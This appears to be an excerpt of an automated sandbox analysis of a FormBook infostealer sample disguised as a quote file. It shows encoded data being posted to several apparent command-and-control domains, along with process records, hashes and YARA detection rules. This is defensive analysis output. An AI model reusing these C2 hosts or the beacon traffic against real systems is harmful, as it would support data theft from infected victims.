                                                                                                                                                                            Data Ascii: Ah=UxIKiLe2YTMMucp1cknr/lvRPilYye2a2aUyT7ooEPiZ+M9laCzyuk+Cj0ACUc1Xj3PBEzMikc2OwAwV2U3YcEtQNSuldDuFSFLqtX4ZvdrtzsIXJ8nYBSt4WixsgMQGFUSTvrQeS3bF2ALmSrEc/AB4lOAEyiCQRteuR28KzxDdBoJ60frZ6YG42xBHQgx4JfbUXIcjCGYnorlnBX+HKc9srsREUMEJTT8c/YAelVoMtd7DVG95pe2gRymUZvd5CQCySuUNi0mNbI2IjOIeQSpxdR8j2zrm+GvtF0fKPylcyHvwx86I3jI/Iy1oAmZYND+uHHZao1YULrf8SNGfq5Hjmh+wfqEv0pYtXjoVsmsBm4AQr3QF7z8DmRM6Jle5kz7V9ENuzVeQCbKiFDPtglXbcT4H0zAsBw9ZDicIqN5qUJnxpSxd7Wjuf7TEjsYFh8TVkZVJEhMINNB71oB9tN9Jbd3MuCHGpXzC3Jh9ia6VY9CCXokdhorcMmPM5Fna0jWcLvmtvfHDnl7jDPHs/l4UWlU2R7YgDXjlr1zXrt6Kfe/atbpJJClScSX+GMqlbQb/aVZEiQRlyU/iGT9WlwBuCKAf1i2+P5RwMtr9cJFswjVGlQ7KcDxpTPnjOK/ZsdAJ+QEz4DcJn9XFfZwUW0vtrwqX3l2F7YTLAtE/OTQX0CIM5Nt9CUttknTBEaUhixThWPpXUsm2heS317fu4WtaAmX3W37uuKqcNR5ii5BVCEsAg0HjGhzCVUasAIDFi270oWTK/2HbA8biYWokmsz++D2mMrT/DhYDq7im+/Hi0L9fvIQUhgw0UuIudUjJxsXqNnW8xYXiKYdJTJP+TZ/V8m4dcQhdhAtIJhM51Z/UBd16QcTx3+8/1AOmp5E83/pHTaSwAvO7v0dtfcDJNcjlzfvs7+FiLCMwmJCLFpVOP2cdx0c0OGeSOBlsyIk7Qt/NZXW0sByFi5PjgbIj7ghVNqbODF6lLrxuG2EES/8orvoNx [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 63718 | 3.33.130.190 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:31:37.032845974 CEST | 582 | OUT | GET /e55r/?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg== HTTP/1.1
                                                                                                                                                                            Host: www.tracy.club
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:31:37.480252981 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: openresty
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:37 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Length: 269
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg=="}</script></head></html>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            25 | 192.168.2.5 | 63719 | 85.159.66.93 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:42.600414038 CEST | 862 | OUT | POST /zmf1/ HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                                                                                            Referer: http://www.sppsuperplast.online/zmf1/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9SITRobvqVcXD3Wg41j9UykS4SGwGX6pRX/CGNsxJi3dR36lt3jaCx8eO3YwBtCFFB4x8kuqqfI4H8NvQRg3wPRcrJzZ7qge4t8sRDmAhH1nQ7azaJ2J1G6+9fZx+ZWQ3irk9ckfo+qz6Zp2cWvo52rfHtqgqZRtY+phZ3d1we+377lWW/DMAQv8VZvf/c7luFOMhhI=


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            26 | 192.168.2.5 | 63720 | 85.159.66.93 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:45.148454905 CEST | 882 | OUT | POST /zmf1/ HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                                                                                            Referer: http://www.sppsuperplast.online/zmf1/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=9SITRobvqVcXAWmg+WL9cykdhSGwM36XRXDCGJ0hOQTdQXqliWjaFx8eWHY5c9CeFBk58hOqqbg4H4JvQm00iPRekpzHlage4t8sRDzthDZnXISzbsCI4m69qvZxoZXX3iqD9cUlo8iz6dh2dDDpsGrdZtrcurIFWNF/Qk1wn/XK+NI8MdLkTwDEFKnousaM0me8/2e3P9n+rtv5gQsLgJzh+YG2


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            27 | 192.168.2.5 | 63721 | 85.159.66.93 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:47.694169044 CEST | 1899 | OUT | POST /zmf1/ HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.sppsuperplast.online
                                                                                                                                                                            Referer: http://www.sppsuperplast.online/zmf1/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            28 | 192.168.2.5 | 63722 | 85.159.66.93 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:50.235347033 CEST | 592 | OUT | GET /zmf1/?Ah=wQgzSdKeo0kEfEOz4RbofRMggT2xbAKfRVneK/8vOxPjchK4g13SHjFeWQ1KQd6iPh0o+E7CiOJrL4NuVjgo/c0di4XWtbQHuM4tDDSwmQdaf4WdVMWT5U3p3+pOk6ad0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.sppsuperplast.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:31:50.929873943 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:50 GMT
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                                            X-Rate-Limit-Reset: 2024-09-27T15:31:55.8118827Z


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            29 | 192.168.2.5 | 63723 | 160.251.148.20 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:56.465771914 CEST | 841 | OUT | POST /bie8/ HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.nojamaica.net
                                                                                                                                                                            Referer: http://www.nojamaica.net/bie8/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=BCXUAw5VGTeh9vJLzzMYfaGc+ET9iUQdeEmBpoMdgZ9rYudjCJS763uVB4OEaJ2/skRtYsESVXJwALlezFIONqmOtlG8PcVbBN5m7igkLVt8sEhm/oMeTL42Gb53EIe8ph3LXauyFBhk4v6Np+0Fr1oYw1gnw+xL/bJIndQh8WYOr8xvJ2NCkR7PW7Ow/phCx9uqMVg=
                                                                                                                                                                            Sep 27, 2024 17:31:57.286891937 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:57 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            30 | 192.168.2.5 | 63725 | 160.251.148.20 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Sep 27, 2024 17:31:59.012377024 CEST | 861 | OUT | POST /bie8/ HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.nojamaica.net
                                                                                                                                                                            Referer: http://www.nojamaica.net/bie8/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=BCXUAw5VGTeh9L1LxQ0YY6GdykT97kQZeEqBpp4N16ZrbPtjDIS72XuVOYPACp3xskMQYt4SVXNwAJ9ez0IJOamIn1G6A8VbBN5m7i0KLV18swdmtZMZar43QL53AIf7ph3lXbyUFHtk4qeNov0E8loS6Vg26e0h461pm+Vis2ITnqcFTUFq3xX3GoGHuZArre+aSC0UURGLv8kEbgl1Vm2S2deA
Sep 27, 2024 17:31:59.822199106 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:59 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 63726 | 160.251.148.20 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:32:01.550728083 CEST | 1878 | OUT | POST /bie8/ HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.nojamaica.net
                                                                                                                                                                            Referer: http://www.nojamaica.net/bie8/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:32:02.544923067 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:32:02 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 63727 | 160.251.148.20 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:32:04.095128059 CEST | 585 | OUT | GET /bie8/?Ah=MA/0DFY0DiyH2olo7m8hVrrP5UH/jhcgcmWioqAK+793cplJM4qg3DyTQ66FMurZmF9Te+JpNl4zVYtM50IcS4zemXuWAdJhdKdflRI3BWRfqiAf3s5RU6wyOr9MBb+x+g==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:32:04.944849014 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:32:04 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Content-Length: 196
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 63728 | 208.91.197.39 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:32:10.442198038 CEST | 850 | OUT | POST /xf5b/ HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.alphaaistore.com
                                                                                                                                                                            Referer: http://www.alphaaistore.com/xf5b/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=WW0cHqpvWEexcD2dHtZwqL5CnBvsW0i3eI91G04OQAlZLlsrevUOMlNAS0OyezFaqSbVMcnYOs0zNoAGto6/mCMp5Bh/AeDuWBi2uS9UY1X84ykstSeABFhR+rWOIyHlsPHtT7tKYxas0GfH3kS5GttkmME+Xkfu17yO0xT9pOYcD0MRnbvvSLGIqGV8G5lx/KF+wYo=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 63729 | 208.91.197.39 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:32:13.025866985 CEST | 870 | OUT | POST /xf5b/ HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.alphaaistore.com
                                                                                                                                                                            Referer: http://www.alphaaistore.com/xf5b/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Ascii: Ah=WW0cHqpvWEexfg+dFOxwsr5N+xvsYUizeI51GxYeRyRZLBkrftsOc1NAGkONRTEYqSmqMcrYOoczNsEGsbS4nSMv1hh9duDuWBi2uS4BY2n84B8srxGDe1hWu7WOMyH5sPG6T5YhYzSs0EHH31TvPtti78Fpc0yc1aiB0ji78Is0GCh795nHBrqw6VdLXJEYlpVOuP/Ag1KPG/dy0cIf7+QA4Rt/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 63730 | 208.91.197.39 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:32:15.571778059 CEST | 1887 | OUT | POST /xf5b/ HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.alphaaistore.com
                                                                                                                                                                            Referer: http://www.alphaaistore.com/xf5b/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 63731 | 208.91.197.39 | 80 | 5008 | C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:32:18.115799904 CEST | 588 | OUT | GET /xf5b/?Ah=bUc8Ed0aZESOAy+KJaIejJlAhDqRJymtCfRMAnUAQR11I0sOX+AQaEFDTlraWU4+rT7gLfO5Dt9FKcAEmJO6tRh3wQ1OL/3vPyqK0hsKckbG/SsYmEPJIzY3hoX+M0Wr3w==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
Sep 27, 2024 17:32:19.335733891 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:32:18 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                            Set-Cookie: vsid=907vr4749967386924613; expires=Wed, 26-Sep-2029 15:32:18 GMT; Max-Age=157680000; path=/; domain=www.alphaaistore.com; HttpOnly
                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_h3dUMVMQ/Tk94Fq0yoPok5QyIT/DSRmovzrNNCz/K3l/Yb4FU1nosxLAM3e7WA5VPvoJMW6WmlNd/QkqeA3X/w==
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Ascii: b472<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:11:29:16
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Quote #270924.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Quote #270924.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:1'366'661 bytes
                                                                                                                                                                            MD5 hash:1018070FFEB3F5FA59A306FA6E6B0F57
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:11:29:21
                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Quote #270924.exe"
                                                                                                                                                                            Imagebase:0xd10000
                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
